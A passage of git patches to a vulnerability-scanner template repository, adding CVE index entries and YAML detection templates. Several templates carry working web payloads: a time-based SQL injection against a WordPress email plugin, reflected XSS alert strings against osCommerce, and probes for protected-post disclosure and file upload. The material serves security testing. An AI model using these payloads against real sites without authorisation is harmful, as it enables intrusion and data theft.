Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in the FundRaiserEditor.php component of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-31548.yaml"} +{"ID":"CVE-2023-32077","Info":{"Name":"Netmaker - Hardcoded DNS Secret Key","Severity":"high","Description":"Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-32077.yaml"} {"ID":"CVE-2023-32117","Info":{"Name":"Integrate Google Drive \u003c= 1.1.99 - Missing Authorization via REST API Endpoints","Severity":"high","Description":"The Integrate Google Drive plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in versions up to, and including, 1.1.99. This makes it possible for unauthenticated attackers to perform a wide variety of operations, such as moving files, creating folders, copying details, and much more.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2023/CVE-2023-32117.yaml"} {"ID":"CVE-2023-3219","Info":{"Name":"EventON Lite \u003c 2.1.2 - Arbitrary File Download","Severity":"medium","Description":"The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors\nto access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-3219.yaml"} {"ID":"CVE-2023-32235","Info":{"Name":"Ghost CMS \u003c 5.42.1 - Path Traversal","Severity":"high","Description":"Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-32235.yaml"} @@ -2208,6 +2209,7 @@ {"ID":"CVE-2023-3849","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooDating 1.2. Affected is an unknown function of the file /find-a-match of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3849.yaml"} {"ID":"CVE-2023-38501","Info":{"Name":"CopyParty v1.8.6 - Cross Site Scripting","Severity":"medium","Description":"Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack.Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-38501.yaml"} {"ID":"CVE-2023-38646","Info":{"Name":"Metabase \u003c 0.46.6.1 - Remote Code Execution","Severity":"critical","Description":"Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38646.yaml"} +{"ID":"CVE-2023-38964","Info":{"Name":"Academy LMS 6.0 - Cross-Site Scripting","Severity":"medium","Description":"Creative Item Academy LMS 6.0 was discovered to contain a cross-site scripting (XSS) vulnerability through `query` parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-38964.yaml"} {"ID":"CVE-2023-39002","Info":{"Name":"OPNsense - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in the act parameter of system_certmanager.php in OPNsense before 23.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39002.yaml"} {"ID":"CVE-2023-39026","Info":{"Name":"FileMage Gateway - Directory Traversal","Severity":"high","Description":"Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39026.yaml"} {"ID":"CVE-2023-39108","Info":{"Name":"rConfig 3.9.4 - Server-Side Request Forgery","Severity":"high","Description":"rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_b parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-39108.yaml"} @@ -2252,6 +2254,7 @@ {"ID":"CVE-2023-42793","Info":{"Name":"JetBrains TeamCity \u003c 2023.05.4 - Remote Code Execution","Severity":"critical","Description":"In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-42793.yaml"} {"ID":"CVE-2023-43177","Info":{"Name":"CrushFTP \u003c 10.5.1 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43177.yaml"} {"ID":"CVE-2023-43187","Info":{"Name":"NodeBB XML-RPC Request xmlrpc.php - XML Injection","Severity":"critical","Description":"A remote code execution (RCE) vulnerability in the xmlrpc.php endpoint of NodeBB Inc NodeBB forum software prior to v1.18.6 allows attackers to execute arbitrary code via crafted XML-RPC requests.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43187.yaml"} +{"ID":"CVE-2023-43208","Info":{"Name":"NextGen Healthcare Mirth Connect - Remote Code Execution","Severity":"critical","Description":"Unauthenticated remote code execution vulnerability in NextGen Healthcare Mirth Connect before version 4.4.1.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43208.yaml"} {"ID":"CVE-2023-43261","Info":{"Name":"Milesight Routers - Information Disclosure","Severity":"high","Description":"A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43261.yaml"} {"ID":"CVE-2023-43325","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the data[redirect_url] parameter on user login function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43325.yaml"} {"ID":"CVE-2023-43326","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43326.yaml"} @@ -2344,6 +2347,7 @@ {"ID":"CVE-2024-22320","Info":{"Name":"IBM Operational Decision Manager - Java Deserialization","Severity":"high","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-22320.yaml"} {"ID":"CVE-2024-23334","Info":{"Name":"aiohttp - Directory Traversal","Severity":"high","Description":"aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-23334.yaml"} {"ID":"CVE-2024-2389","Info":{"Name":"Progress Kemp Flowmon - Command Injection","Severity":"critical","Description":"In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified. An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-2389.yaml"} +{"ID":"CVE-2024-24131","Info":{"Name":"SuperWebMailer 9.31.0.01799 - Cross-Site Scripting","Severity":"medium","Description":"SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-24131.yaml"} {"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"} {"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"} {"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"} @@ -2353,12 +2357,14 @@ {"ID":"CVE-2024-27497","Info":{"Name":"Linksys E2000 1.0.06 position.js Improper Authentication","Severity":"high","Description":"Linksys E2000 Ver.1.0.06 build 1 is vulnerable to authentication bypass via the position.js file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27497.yaml"} {"ID":"CVE-2024-27564","Info":{"Name":"ChatGPT个人专用版 - Server Side Request Forgery","Severity":"high","Description":"A Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the urlparameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27564.yaml"} {"ID":"CVE-2024-27954","Info":{"Name":"WordPress Automatic Plugin \u003c3.92.1 - Arbitrary File Download and SSRF","Severity":"critical","Description":"WordPress Automatic plugin \u003c3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27954.yaml"} +{"ID":"CVE-2024-27956","Info":{"Name":"WordPress Automatic Plugin \u003c= 3.92.0 - SQL Injection","Severity":"critical","Description":"The Automatic plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.92.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-27956.yaml"} {"ID":"CVE-2024-28255","Info":{"Name":"OpenMetadata - Authentication Bypass","Severity":"critical","Description":"OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. The `JwtFilter` handles the API authentication by requiring and verifying JWT tokens. When a new request comes in, the request's path is checked against this list. When the request's path contains any of the excluded endpoints the filter returns without validating the JWT. Unfortunately, an attacker may use Path Parameters to make any path contain any arbitrary strings. For example, a request to `GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/111` will match the excluded endpoint condition and therefore will be processed with no JWT validation allowing an attacker to bypass the authentication mechanism and reach any arbitrary endpoint, including the ones listed above that lead to arbitrary SpEL expression injection. This bypass will not work when the endpoint uses the `SecurityContext.getUserPrincipal()` since it will return `null` and will throw an NPE. This issue may lead to authentication bypass and has been addressed in version 1.2.4. Users are advised to upgrade. There are no known workarounds for this vulnerability. This issue is also tracked as `GHSL-2023-237`.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-28255.yaml"} {"ID":"CVE-2024-28734","Info":{"Name":"Coda v.2024Q1 - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability in Unit4 Financials by Coda v.2024Q1 allows a remote attacker to escalate privileges via a crafted script to the cols parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-28734.yaml"} {"ID":"CVE-2024-2879","Info":{"Name":"WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection","Severity":"critical","Description":"The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-2879.yaml"} {"ID":"CVE-2024-29059","Info":{"Name":".NET Framework - Leaking ObjRefs via HTTP .NET Remoting","Severity":"high","Description":".NET Framework Information Disclosure Vulnerability","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-29059.yaml"} {"ID":"CVE-2024-29269","Info":{"Name":"Telesquare TLR-2005KSH - Remote Command Execution","Severity":"critical","Description":"Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-29269.yaml"} {"ID":"CVE-2024-31621","Info":{"Name":"Flowise 1.6.5 - Authentication Bypass","Severity":"high","Description":"The flowise version \u003c= 1.6.5 is vulnerable to authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-31621.yaml"} +{"ID":"CVE-2024-31849","Info":{"Name":"CData API Server \u003c 23.4.8844 - Path Traversal","Severity":"critical","Description":"A path traversal vulnerability exists in the Java version of CData API Server \u003c 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31849.yaml"} {"ID":"CVE-2024-32399","Info":{"Name":"RaidenMAILD Mail Server v.4.9.4 - Path Traversal","Severity":"high","Description":"Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32399.yaml"} {"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"high","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"} {"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 14bf5eec07..59bba03b5a 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -c00921b7455dc0164b91d29896a81273 +9895478dd995b34657d5410bb4f56b5e From f1b99899f81a6251042cceb0d35de1c40da85846 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 1 May 2024 06:30:15 +0000 Subject: [PATCH 0490/1768] Auto Template Signing [Wed May 1 06:30:15 UTC 2024] :robot: --- http/cves/2023/CVE-2023-38964.yaml | 1 + http/cves/2023/CVE-2023-43208.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2023/CVE-2023-38964.yaml b/http/cves/2023/CVE-2023-38964.yaml index 0c46ae9543..17331d3e27 100644 --- a/http/cves/2023/CVE-2023-38964.yaml +++ b/http/cves/2023/CVE-2023-38964.yaml @@ -42,3 +42,4 @@ http: - 'contains(header, "text/html")' - 'contains_all(body, "", "All courses")' condition: and +# digest: 490a004630440220588a1a20171ed9e63186819de5ce752cf21132d717d03d74100877a2037385cf022007fb5a6ec93b218fd213ed4c152c786d03f8e6aae0ec8e2eaee9177460c173e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43208.yaml b/http/cves/2023/CVE-2023-43208.yaml index a1a9c1ca94..b840e7cc68 100644 --- a/http/cves/2023/CVE-2023-43208.yaml +++ b/http/cves/2023/CVE-2023-43208.yaml @@ -104,3 +104,4 @@ http: regex: - '(.*)' internal: true +# digest: 4a0a0047304502206fe736214580619678b34e475a3c7fd97fa9c3bbd559bf1db7ac3d3724dd3832022100878eabed20ca61c94683b6daeb92fa1739f9893c5501986e8c77541479cd3adb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 01f2a38ad3fbaefce8918cac36707cc9b820da6a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 1 May 2024 15:22:04 +0530 Subject: [PATCH 0491/1768] Create CVE-2024-2876.yaml --- http/cves/2024/CVE-2024-2876.yaml | 34 +++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/cves/2024/CVE-2024-2876.yaml diff --git a/http/cves/2024/CVE-2024-2876.yaml b/http/cves/2024/CVE-2024-2876.yaml new file mode 100644 index 0000000000..0333e9cf52 --- /dev/null +++ b/http/cves/2024/CVE-2024-2876.yaml @@ -0,0 +1,34 @@ +id: CVE-2024-2876 + +info: + name: Wordpress Email Subscribers by Icegram Express - SQL Injection + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + The Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'run' function of the 'IG_ES_Subscribers_Query' class in all versions up to, and including, 5.7.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-2876 + - https://www.wordfence.com/blog/2024/04/1250-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-email-subscribers-by-icegram-express-wordpress-plugin/ + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/email-subscribers/" + tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,email-subscribers,wpscan + +http: + - raw: + - | + POST /wp-admin/admin-post.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(5)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111 + + matchers: + - type: dsl + dsl: + - 'duration>=5' + - 'status_code == 200' + - 'contains(header, "application/json")' + - 'contains_all(body, "bulk_action", "_sent", "errortype")' + condition: and From e67740a2386bd46f1d6e9adf64b380d91cb40610 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Wed, 1 May 2024 14:04:17 +0300 Subject: [PATCH 0492/1768] add cve-2024-4348 --- http/cves/2024/CVE-2024-4348.yaml | 33 +++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 http/cves/2024/CVE-2024-4348.yaml diff --git a/http/cves/2024/CVE-2024-4348.yaml b/http/cves/2024/CVE-2024-4348.yaml new file mode 100644 index 0000000000..72fdc8e19c --- /dev/null +++ b/http/cves/2024/CVE-2024-4348.yaml @@ -0,0 +1,33 @@ +id: CVE-2024-4348 + +info: + name: osCommerce 4 - Reflected XSS + author: Kazgangap + severity: medium + description: | + A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-4348 + - https://packetstormsecurity.com/files/178375/osCommerce-4-Cross-Site-Scripting.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-4348 + cwe-id: CWE-79 + tags: packetstorm,xss,rxss,vuln,cwe-79,security + +http: + - method: GET + path: + - "{{BaseURL}}/furniture/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253eiyehb=1" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: status + status: + - 200 \ No newline at end of file From 400fb0572018bc3e66444d838cb1cdc73dc25600 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Wed, 1 May 2024 14:05:50 +0300 Subject: [PATCH 0493/1768] fix --- http/cves/2024/CVE-2024-4348.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-4348.yaml b/http/cves/2024/CVE-2024-4348.yaml index 72fdc8e19c..d3cbce6a22 100644 --- a/http/cves/2024/CVE-2024-4348.yaml +++ b/http/cves/2024/CVE-2024-4348.yaml @@ -19,7 +19,7 @@ info: http: - method: GET path: - - "{{BaseURL}}/furniture/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253eiyehb=1" + - "{{BaseURL}}/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253eiyehb=1" matchers-condition: and matchers: From a0df537f34ab7a432d33b8912f621f50cfc02a0e Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Wed, 1 May 2024 17:27:37 +0300 Subject: [PATCH 0494/1768] add cve-2024-0881 --- http/cves/2024/CVE-2024-0881.yaml | 32 +++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/cves/2024/CVE-2024-0881.yaml diff --git a/http/cves/2024/CVE-2024-0881.yaml b/http/cves/2024/CVE-2024-0881.yaml new file mode 100644 index 0000000000..f98e32e521 --- /dev/null +++ b/http/cves/2024/CVE-2024-0881.yaml @@ -0,0 +1,32 @@ +id: CVE-2024-0881 + +info: + name: Combo Blocks < 2.2.76 - Password Protected Posts Access + author: Kazgangap + severity: medium + description: | + The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not prevent password protected posts from being displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-0881 + - https://wpscan.com/vulnerability/e460e926-6e9b-4e9f-b908-ba5c9c7fb290/ + classification: + epss-score: 0.00043 + epss-percentile: 0.08273 + tags: wpscan,wordpress,wp-plugin,unauth,cve2023 + +http: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_paginate_ajax_free" + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_ajax_search_free" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - '"html"' + - '"
Date: Thu, 2 May 2024 15:33:01 +0530 Subject: [PATCH 0496/1768] updated matcher and info --- http/cves/2024/CVE-2024-4348.yaml | 27 ++++++++++++++++++++------- 1 file changed, 20 insertions(+), 7 deletions(-) diff --git a/http/cves/2024/CVE-2024-4348.yaml b/http/cves/2024/CVE-2024-4348.yaml index d3cbce6a22..1ed75b90f1 100644 --- a/http/cves/2024/CVE-2024-4348.yaml +++ b/http/cves/2024/CVE-2024-4348.yaml @@ -1,33 +1,46 @@ id: CVE-2024-4348 info: - name: osCommerce 4 - Reflected XSS + name: osCommerce v4.0 - Cross-site Scripting author: Kazgangap severity: medium description: | A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2024-4348 - https://packetstormsecurity.com/files/178375/osCommerce-4-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2024-4348 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N cvss-score: 4.3 cve-id: CVE-2024-4348 cwe-id: CWE-79 - tags: packetstorm,xss,rxss,vuln,cwe-79,security + metadata: + verified: true + max-request: 2 + shodan-query: html:"osCommerce" + tags: packetstorm,xss,rxss,oscommerce http: - method: GET path: - - "{{BaseURL}}/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253eiyehb=1" + - "{{BaseURL}}/furniture/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%2528'document_domain'%2529%253c%252fScRiPt%253eiyehb=1" + - "{{BaseURL}}/watch/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%2528'document_domain'%2529%253c%252fScRiPt%253eiyehb=1" + stop-at-first-match: true matchers-condition: and matchers: - type: word - words: - - "" part: body + words: + - "" + - "Listing of all products on the site" + condition: and + + - type: word + part: header + words: + - 'text/html' - type: status status: - - 200 \ No newline at end of file + - 200 From f0c5e1d4f195ed80ed6ddbdc30556d8f6e212d05 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 2 May 2024 21:40:16 +0530 Subject: [PATCH 0497/1768] format update --- http/cves/2015/CVE-2015-4455.yaml | 17 ++++++++++++++--- 1 file changed, 14 insertions(+), 3 deletions(-) diff --git a/http/cves/2015/CVE-2015-4455.yaml b/http/cves/2015/CVE-2015-4455.yaml index a91002e7e8..0e318a76ac 100644 --- a/http/cves/2015/CVE-2015-4455.yaml +++ b/http/cves/2015/CVE-2015-4455.yaml @@ -1,6 +1,7 @@ id: CVE-2015-4455 + info: - name: CVE-2015-4455 + name: WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload author: MaStErChO severity: critical description: | @@ -8,9 +9,19 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2015-4455 - http://packetstormsecurity.com/files/132256/WordPress-Aviary-Image-Editor-Add-On-For-Gravity-Forms-3.0-Beta-Shell-Upload.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2015-4455 + cwe-id: CWE-434 + epss-score: 0.28491 + epss-percentile: 0.96807 + cpe: cpe:2.3:a:aviary_image_editor_add-on_for_gravity_forms_project:aviary_image_editor_add-on_for_gravity_forms:*:beta:*:*:*:wordpress:*:* metadata: + vendor: aviary_image_editor_add-on_for_gravity_forms_project + product: aviary_image_editor_add-on_for_gravity_forms framework: wordpress - + tags: cve,cve2015,packetstorm,intrusive,file-upload variables: filename: '{{rand_base(7, "abc")}}' @@ -54,4 +65,4 @@ http: - 'contains(body_1, "Failed to upload file")' - 'status_code_2 == 200' - 'contains(body_2, "uploaded_filename\":\"{{filename}}.jpg")' - condition: and \ No newline at end of file + condition: and From 3a9df23bbdcaca751a9fbfb12b5775736625fd41 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 2 May 2024 21:42:33 +0530 Subject: [PATCH 0498/1768] format update --- .../prestashop-cartabandonmentpro-file-upload.yaml | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git 